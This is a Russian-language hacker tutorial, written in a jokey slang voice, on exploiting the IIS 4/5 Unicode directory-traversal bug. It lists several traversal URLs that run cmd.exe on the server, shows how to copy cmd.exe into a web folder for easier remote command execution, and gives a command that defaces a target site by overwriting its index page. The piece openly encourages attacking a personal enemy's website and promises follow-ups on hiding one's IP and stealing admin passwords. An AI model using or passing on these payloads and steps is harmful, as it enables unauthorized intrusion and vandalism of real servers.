Unicode bug в IIS серверах.

Автор Dr.M(:)rG

Привет! Наконец-то прородился на статью про IIS. О его глючности и дырявости вы, возможно, уже наслышаны. IIS - это мелкосовковый сервер, который обычно поставляется с такими Осками как NT4(IIS 4.0) или c различные линейками Windows2000 (IIS 5.0) У меня, например, виндавз 2000 Advanced Server с IIS 5.0 Чем приколен IIS? - да тем что встроен в окна, с его настройкой меньше возьни чем скажем с Апачи под те же форточки. Короче, интеграция с виндами полная, но вот что касается безопасности, то тут сисадминам спать не приходится… Ну теперь собсна к ближе к телу, т.е. делу.
Наверно в снах вам не раз представлялось как ВЫ - продвинутый хакер, от одного никнэйма которого все делают в штаны, заходите на вражеский сервак, двойным нажатием на Shift получаете все мыслемые и немыслемые права на тачку противника (ну это вы, батенька, фильма "Хакеры" насмотрелись), и…. понеслась, кул-хацкера не остановишь … а когда ты уже научилися гасить-зажигать лампочки на всех небоскребах Америки и тока собирался отформатить на этом серваке винт… тебя будет твоя бабуля, дает тебе 3.14здюлей и отправляет в школу… Облом? Да не отчаивайся ты. Лох - это совсем не судьба. Теперь твои сны станут реальностью! Ты станешь крутым хацкером и телки тебе дадут! Чиста для тебя один супер миллиардер написал сервачок над которым ты можешь проглумиться.


Этап номер 1. Определение сервака.

Хех.. Ну вот наконец-то настала твоя очередь сдавать бутылки и на вырученное бабло ты прикупил часок-другой инета. Заходишь на сайт Педалькина (а этого "лосося" ты просто ненавидишь) и понимаешь, что www.pedalkin.ru должен умереть. Неплохо бы узнать на чем стоит сей отстой? Хмм есть много вариантов, но я предпочитаю следующий: бежим на www.netcraft.com. Нажимаем на ссылочку в левом верхнем углу (What's that site running? - Типа на чем Педалькин сайт держит) Далее вываливается пага, на которой вводишь имя сайта - www.pedalkin.ru и кликаешь Examine (фу какой ликбез.. еще чуть-чуть и я забью на эту статейку) Нажал? Если видишь надпись по типу такой : " The site www.pedalkin.ru is running Microsoft-IIS/5.0 on Windows 2000. " или подобную (главное чтоб IIS версии 4 или 5 был), тогда тебе повезло… Иначе… Эххх, ну иди еще раз посмотри "Хакеров" и иди спать.

Этап номер 2. Проверка на Unicode bug.

Чтобы окончательно решить идти или не идти смотреть "Хакеров" проверим сервак на глюкавость. Для этого нам понадобятся пиво, чипсы, сухарики к пиву, вобла, еще пиво и пару строк, которых надо прилепить к урлю сервера. Строчки эти такие:


/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\


Добавляем одну из них к www.pedalkin.ru в конец и запускаем полученный url в броузере и смотрим, что нам вернет сервак. Если ты перепробывал все варианты, а он вернул ошибку - вали учиться хакать банковские сервера по двойному нажатию Shift'a…. А если ты видишь содержание диска Ц: - это твой день! Гы… Добро пожаловать в органы сынок! Хак не даст тебе засохнуть!


Этап номер 3. Внутри.

Ну вот я и в Хопре, т.е. ты внутри. Слышь, точилка, всосал что сейчас произошло? Эээ выходи из ступора - это еще не хак. Ну как? Отлегло? Короче для "небыстрых" : ты только что получил доступ к командной строке с привилегиями того чела, который сидит на тачке. (Если админ, то тебе повезло!) Итак, что ты могешь, батенька? Да практически все, что позволяют права. Можем смотреть файлы, лазать по дискам(меняй путь в конце и команды). Но сначала немного упростим урл, по которому мы поимели консоль. Делаем следующее:

www.pedalkin.ru/msadc/..%c0%af../..%c0%af../..%c0%af../ winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe +c:\progra~1\common~1\system\msadc\mycmd.exe

Теперь урл упростился до безобразия:

www.pedalkin.ru/msadc/mycmd.exe?/c+dir+c:\

Да, кстати, cmd.exe необходимо переименовать, иначе ты немного обломишься при попытках выполнить некоторые команды.
Итак, теперь приступим к d-face! Побегай по диску и поищи где валяется сайтик твоего "другана". Обычно это c:\inetpub\wwwroot\ После этого выполняем следующее:
www.pedalkin.ru/msadc/mycmd.exe?/c+echo+"pedalkin hacked by c00L hax0r"+>+c:\Inetpub\wwwroot\index.html
Гыыы.. Теперь дизайн сайта соответствует всем мировым стандартам. Быстрей заноси этот сайт в базу дэфейснутых на каком-нить хацкерском портале (у нас тоже скоро откроется), звони другу и ори, что ты мега кул хакер, на уроке информатике скажи своему учителю, Простатиту Виагрычу Сухостою, чтоб не выЁЁндривался, а то мол ты и его порешить можешь. Короче жизнь удалась... Но.... есть одно но... Если раньше ты защищался одними резинками, то теперь настало время узнать про анонимные прокси, методы ныкания ip... Об этом всем речь пойдет в следующих статьях. Так же я расскажу как заливать, сливать файло с подверженного Unicode bug сервака. Поделюсь секретами в области d-face, о праблах которые при этом возникают. Как поиметь пароль админа и т.д. А на этом первая часть о Unicode bug закончена...

Dr.M(:)rG mailto: [email protected] or [email protected]